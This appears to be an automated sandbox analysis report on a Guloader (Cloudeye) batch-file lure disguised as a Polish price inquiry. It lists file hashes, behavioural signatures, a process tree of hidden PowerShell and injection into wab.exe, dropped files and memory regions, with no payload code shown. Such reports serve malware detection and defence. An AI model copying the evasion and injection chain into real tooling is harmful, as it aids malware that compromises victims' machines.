Analysis

  • max time kernel
    93s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-07-2024 15:00

General

  • Target
    FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat
  • Size
    6KB
  • MD5
    4eeae7ac7c9b2b2f6585cbfdb82ffd89
  • SHA1
    7978841d26d2be27f6b873a6b3fca3bd999329aa
  • SHA256
    96510f0af47cb70914f106bd98fc99b4a5f782c744dbe587368f8614565a6f47
  • SHA512
    149edad5906d359b943d24f900c868dca0a65aa305dd571c1cfa28e6eeaec654109ad7013d5ba149fd40c341ac50ff3510297bf390a70269faeb2244a8f5f31c
  • SSDEEP
    96:gv/UAWv/UAV1161kylTQdpXxJnSI4ceniGcdZYi8KqYdoTZDm3xMtt8ln9Ex61MV:icHc81xqQTXP/uiG6D8KqYdo1exMzoYV

Malware Config

Signatures

  • Guloader, Cloudeye
    A shellcode-based downloader first seen in 2020.
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
    Runs PowerShell with the display window hidden.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3104
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
        3⤵
          PID:2284
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3108
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
            4⤵
              PID:4684
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:4744
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 1532
                5⤵
                • Program crash
                PID:1304
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4744 -ip 4744
        1⤵
          PID:1084

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_noo1dwqk.whx.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Roaming\Coumarate.Bic
    Filesize: 423KB
    MD5: 007cf6a92566beeac721341fb07ee93e
    SHA1: 8fcb0b9135d89b7cd0d038471bb901c20bee48b7
    SHA256: 362053d0e47717d018306ff0785c59415a2c7a72a44aa1140103efe093f584d8
    SHA512: aad75aa8b7e967723996369c1d6ea0f3fced41b6748496b811024ce7202fab5839290b91222b4cad71d9db53f1efbeab851132823da710d6739297a21ad5cd41
  • memory/3104-3-0x00000221C8770000-0x00000221C8792000-memory.dmp
    Filesize: 136KB
  • memory/3104-13-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp
    Filesize: 10.8MB
  • memory/3104-14-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp
    Filesize: 10.8MB
  • memory/3104-60-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp
    Filesize: 10.8MB
  • memory/3104-45-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp
    Filesize: 10.8MB
  • memory/3104-43-0x00007FFBBEE33000-0x00007FFBBEE35000-memory.dmp
    Filesize: 8KB
  • memory/3104-2-0x00007FFBBEE33000-0x00007FFBBEE35000-memory.dmp
    Filesize: 8KB
  • memory/3108-20-0x0000000075120000-0x00000000758D0000-memory.dmp
    Filesize: 7.7MB
  • memory/3108-41-0x0000000008150000-0x00000000086F4000-memory.dmp
    Filesize: 5.6MB
  • memory/3108-23-0x0000000004E80000-0x0000000004EE6000-memory.dmp
    Filesize: 408KB
  • memory/3108-24-0x00000000055B0000-0x0000000005616000-memory.dmp
    Filesize: 408KB
  • memory/3108-34-0x00000000056A0000-0x00000000059F4000-memory.dmp
    Filesize: 3.3MB
  • memory/3108-35-0x0000000005CD0000-0x0000000005CEE000-memory.dmp
    Filesize: 120KB
  • memory/3108-36-0x0000000005CF0000-0x0000000005D3C000-memory.dmp
    Filesize: 304KB
  • memory/3108-37-0x0000000007520000-0x0000000007B9A000-memory.dmp
    Filesize: 6.5MB
  • memory/3108-38-0x0000000006220000-0x000000000623A000-memory.dmp
    Filesize: 104KB
  • memory/3108-39-0x0000000006F80000-0x0000000007016000-memory.dmp
    Filesize: 600KB
  • memory/3108-40-0x0000000006F10000-0x0000000006F32000-memory.dmp
    Filesize: 136KB
  • memory/3108-22-0x0000000004DD0000-0x0000000004DF2000-memory.dmp
    Filesize: 136KB
  • memory/3108-21-0x0000000075120000-0x00000000758D0000-memory.dmp
    Filesize: 7.7MB
  • memory/3108-19-0x0000000004F10000-0x0000000005538000-memory.dmp
    Filesize: 6.2MB
  • memory/3108-44-0x0000000008700000-0x000000000AFC0000-memory.dmp
    Filesize: 40.8MB
  • memory/3108-18-0x0000000004730000-0x0000000004766000-memory.dmp
    Filesize: 216KB
  • memory/3108-47-0x000000007512E000-0x000000007512F000-memory.dmp
    Filesize: 4KB
  • memory/3108-48-0x0000000075120000-0x00000000758D0000-memory.dmp
    Filesize: 7.7MB
  • memory/3108-49-0x0000000075120000-0x00000000758D0000-memory.dmp
    Filesize: 7.7MB
  • memory/3108-57-0x0000000075120000-0x00000000758D0000-memory.dmp
    Filesize: 7.7MB
  • memory/3108-17-0x000000007512E000-0x000000007512F000-memory.dmp
    Filesize: 4KB
  • memory/4744-56-0x0000000001200000-0x0000000003AC0000-memory.dmp
    Filesize: 40.8MB
  • memory/4744-65-0x0000000001200000-0x0000000003AC0000-memory.dmp
    Filesize: 40.8MB